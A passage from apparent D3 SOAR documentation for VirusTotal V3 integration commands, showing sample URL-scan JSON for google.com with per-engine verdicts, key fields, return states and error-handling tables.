{'attributes': {'last_modification_date': 1632330799, 'last_http_response_cookies': {'NID': '511=*****-*****', '1P_JAR': '2021-09-22-17'}, 'times_submitted': 88586, 'total_votes': {'harmless': 226, 'malicious': 104}, 'title': 'Google', 'last_submission_date': 1632330474, 'last_http_response_content_length': 148497, 'last_http_response_headers': {'x-xss-protection': '0', 'transfer-encoding': 'chunked', 'set-cookie': '1P_JAR=2021-09-22-17; expires=Fri, 22-Oct-2021 17:08:02 GMT; path=/; domain=.google.com; Secure, NID=511=*****-*****; expires=Thu, 24-Mar-2022 17:08:02 GMT; path=/; domain=.google.com; HttpOnly', 'expires': '-1', 'server': 'gws', 'cache-control': 'private, max-age=0', 'date': 'Wed, 22 Sep 2021 17:08:02 GMT', 'p3p': 'CP="This is not a P3P policy! See http://g.co/p3phelp for more info."', 'alt-svc': 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"', 'content-type': 'text/html; charset=UTF-8', 'x-frame-options': 'SAMEORIGIN'}, 'reputation': 345, 'threat_names': [], 'tags': [], 'last_analysis_date': 1632330474, 'first_submission_date': 1281524160, 'categories': {'Forcepoint ThreatSeeker': 'search engines and portals', 'Sophos': 'search engines', 'BitDefender': 'searchengines'}, 'last_http_response_content_sha256': '*****', 'last_http_response_code': 200, 'last_final_url': 'https://www.google.com/ ', 'url': 'https://www.google.com/ ', 'last_analysis_stats': {'harmless': 80, 'malicious': 1, 'suspicious': 0, 'undetected': 9, 'timeout': 0}, 'last_analysis_results': {'CMC Threat Intelligence': {'category': 'malicious', 'result': 'phishing', 'method': 'blacklist', 'engine_name': 'CMC Threat Intelligence'}, 'Snort IP sample list': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Snort IP sample list'}, 'VX Vault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'VX Vault'}, 'Armis': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Armis'}, 'Comodo Valkyrie Verdict': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Comodo Valkyrie Verdict'}, 'PhishLabs': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'PhishLabs'}, 'K7AntiVirus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'K7AntiVirus'}, 'CINS Army': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CINS Army'}, 'Cyren': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Cyren'}, 'Quttera': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quttera'}, 'BlockList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BlockList'}, 'OpenPhish': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'OpenPhish'}, '0xSI_f33d': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': '0xSI_f33d'}, 'Feodo Tracker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Feodo Tracker'}, 'Web Security Guard': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Web Security Guard'}, 'Scantitan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Scantitan'}, 'AlienVault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AlienVault'}, 'Sophos': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sophos'}, 'Phishtank': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishtank'}, 'EonScope': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EonScope'}, 'Cyan': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Cyan'}, 'Spam404': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spam404'}, 'SecureBrain': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'SecureBrain'}, 'Hoplite Industries': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Hoplite Industries'}, 'CRDF': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CRDF'}, 'Rising': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Rising'}, 'StopForumSpam': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'StopForumSpam'}, 'Fortinet': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Fortinet'}, 'http://alphaMountain.ai ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://alphaMountain.ai '}, 'Lionic': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Lionic'}, 'Virusdie External Site Scan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Virusdie External Site Scan'}, 'Artists Against 419': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Artists Against 419'}, 'Google Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Google Safebrowsing'}, 'SafeToOpen': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'SafeToOpen'}, 'ADMINUSLabs': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ADMINUSLabs'}, 'CyberCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyberCrime'}, 'AutoShun': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'AutoShun'}, 'Trustwave': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Trustwave'}, 'AICC (MONITORAPP)': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AICC (MONITORAPP)'}, 'CyRadar': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyRadar'}, 'Dr.Web': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Dr.Web'}, 'Emsisoft': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Emsisoft'}, 'Abusix': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Abusix'}, 'Webroot': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Webroot'}, 'Avira': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Avira'}, 'securolytics': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'securolytics'}, 'Antiy-AVL': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Antiy-AVL'}, 'Quick Heal': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quick Heal'}, 'DNS8': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'DNS8'}, 'http://benkow.cc ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://benkow.cc '}, 'EmergingThreats': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EmergingThreats'}, 'Yandex Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Yandex Safebrowsing'}, 'MalwareDomainList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwareDomainList'}, 'Lumu': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Lumu'}, 'zvelo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'zvelo'}, 'Kaspersky': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Kaspersky'}, 'Malware Domain Blocklist': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malware Domain Blocklist'}, 'http://desenmascara.me ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://desenmascara.me '}, 'URLhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'URLhaus'}, 'PREBYTES': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PREBYTES'}, 'Sucuri SiteCheck': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sucuri SiteCheck'}, 'Blueliv': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Blueliv'}, 'Netcraft': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Netcraft'}, 'ZeroCERT': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ZeroCERT'}, 'Phishing Database': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishing Database'}, 'MalwarePatrol': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwarePatrol'}, 'MalBeacon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalBeacon'}, 'Sangfor': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sangfor'}, 'IPsum': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'IPsum'}, 'Spamhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spamhaus'}, 'Malwared': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malwared'}, 'BitDefender': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BitDefender'}, 'GreenSnow': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'GreenSnow'}, 'G-Data': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'G-Data'}, 'StopBadware': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'StopBadware'}, 'http://SCUMWARE.org ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://SCUMWARE.org '}, 'http://malwares.com URL checker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://malwares.com URL checker'}, 'NotMining': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'NotMining'}, 'Forcepoint ThreatSeeker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Forcepoint ThreatSeeker'}, 'Certego': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Certego'}, 'ESET': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESET'}, 'Threatsourcing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Threatsourcing'}, 'MalSilo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalSilo'}, 'Nucleon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Nucleon'}, 'http://BADWARE.INFO ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://BADWARE.INFO '}, 'ThreatHive': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ThreatHive'}, 'FraudScore': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'FraudScore'}, 'Tencent': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Tencent'}, 'http://Bfore.Ai PreCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://Bfore.Ai PreCrime'}, 'Baidu-International': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Baidu-International'}}, 'html_meta': {'description': ["Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."], 'robots': ['noodp']}, 'outgoing_links': ['https://www.blogger.com/*****', 'https://www.youtube.com/***** ']}, 'type': 'url', 'id': '*****', 'links': {'self': 'https://www.virustotal.com/api/v3/urls/*****'}} |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Url Reports failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 400. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Invalid URLs. |
Error Sample Data Get Url Reports failed. Status Code: 400. Message: Invalid URLs. |
Retrieve Widget HTML Content
Returns the actual HTML content file(s) of the widget report(s) for the given observable(s).
Input
Input Parameter | Required/Optional | Description | Example |
Query Observables | Required | The file hash (md5, sha1 or sha256), URL, IP address or Domain observable(s) to get HTML content of the VirusTotal widget report(s). |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
{
"Results": [
{
"data": {
"url": "https://www.virustotal.com/ui/widget/html/*****",
"found": true,
"detection_ratio": {
"detections": 7,
"total": 90
},
"type": "url",
"id": "https://*****.*****.***/",
"FileID": "*****",
"FileName": "*****"
}
}
]
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"WidgetURLs": ["https://www.google.com/"],
"ObservableTypes": ["url"],
"ObservableIDs": ["url"],
"FileIDs": ["*****"],
"FileNames": ["*****"]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
Results | {'data': {'url': 'https://www.virustotal.com/ui/widget/html/***** ', 'found': True, 'detection_ratio': {'detections': 7, 'total': 90}, 'type': 'url', 'id': '***** ', 'FileID': '*****', 'FileName': '*****'}} |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Retrieve Widget HTML Content failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 403. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Expecting value: line 1 column 1. |
Error Sample Data Retrieve Widget HTML Content failed. Status Code: 403. Message: Expecting value: line 1 column 1. |
Scan URL
Analyze and retrieve scan reports on URLs.
Input
Input Parameter | Required/Optional | Description | Example |
URLs | Required | The list of URLs to scan and analyze. |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
[
{
"data": {
"attributes": {
"last_modification_date": 1632330799,
"last_http_response_cookies": {
"NID": "511=*****-*****",
"1P_JAR": "2021-09-22-17"
},
"times_submitted": 88586,
"total_votes": {
"harmless": 226,
"malicious": 104
},
"title": "Google",
"last_submission_date": 1632330474,
"last_http_response_content_length": 148497,
"last_http_response_headers": {
"x-xss-protection": "0",
"transfer-encoding": "chunked",
"set-cookie": "1P_JAR=2021-09-22-17; expires=Fri, 22-Oct-2021 17:08:02 GMT; path=/; domain=.google.com; Secure, NID=511=*****-*****; expires=Thu, 24-Mar-2022 17:08:02 GMT; path=/; domain=.google.com; HttpOnly",
"expires": "-1",
"server": "gws",
"cache-control": "private, max-age=0",
"date": "Wed, 22 Sep 2021 17:08:02 GMT",
"p3p": "CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"",
"alt-svc": "h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000,h3-T051=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"",
"content-type": "text/html; charset=UTF-8",
"x-frame-options": "SAMEORIGIN"
},
"reputation": 345,
"threat_names": [],
"tags": [],
"last_analysis_date": 1632330474,
"first_submission_date": 1281524160,
"categories": {
"Forcepoint ThreatSeeker": "search engines and portals",
"Sophos": "search engines",
"BitDefender": "searchengines"
},
"last_http_response_content_sha256": "*****",
"last_http_response_code": 200,
"last_final_url": "https://www.google.com/",
"url": "https://www.google.com/",
"last_analysis_stats": {
"harmless": 80,
"malicious": 1,
"suspicious": 0,
"undetected": 9,
"timeout": 0
},
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "malicious",
"result": "phishing",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"Comodo Valkyrie Verdict": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Cyren": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyren"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"BlockList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BlockList"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"Feodo Tracker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Feodo Tracker"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"Rising": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Rising"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Fortinet": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Fortinet"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"Artists Against 419": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Artists Against 419"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"Malware Domain Blocklist": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malware Domain Blocklist"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Sangfor": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sangfor"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
}
},
"html_meta": {
"description": [
"Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."
],
"robots": [
"noodp"
]
},
"outgoing_links": [
"https://www.blogger.com/*****",
"https://www.youtube.com/*****"
]
},
"type": "url",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****"
}
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"Urls": [
"http://*****.*****.***"
],
"HarmlessCounts": [
0
],
"MaliciousCounts": [
1
],
"SuspiciousCounts": [
2
],
"UndetectedCounts": [
69
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
DATA |
|---|
{'attributes': {'last_modification_date': 1632330799, 'last_http_response_cookies': {'NID': '511=*****-*****', '1P_JAR': '2021-09-22-17'}, 'times_submitted': 88586, 'total_votes': {'harmless': 226, 'malicious': 104}, 'title': 'Google', 'last_submission_date': 1632330474, 'last_http_response_content_length': 148497, 'last_http_response_headers': {'x-xss-protection': '0', 'transfer-encoding': 'chunked', 'set-cookie': '1P_JAR=2021-09-22-17; expires=Fri, 22-Oct-2021 17:08:02 GMT; path=/; domain=.google.com; Secure, NID=511=*****-*****; expires=Thu, 24-Mar-2022 17:08:02 GMT; path=/; domain=.google.com; HttpOnly', 'expires': '-1', 'server': 'gws', 'cache-control': 'private, max-age=0', 'date': 'Wed, 22 Sep 2021 17:08:02 GMT', 'p3p': 'CP="This is not a P3P policy! See http://g.co/p3phelp for more info."', 'alt-svc': 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"', 'content-type': 'text/html; charset=UTF-8', 'x-frame-options': 'SAMEORIGIN'}, 'reputation': 345, 'threat_names': [], 'tags': [], 'last_analysis_date': 1632330474, 'first_submission_date': 1281524160, 'categories': {'Forcepoint ThreatSeeker': 'search engines and portals', 'Sophos': 'search engines', 'BitDefender': 'searchengines'}, 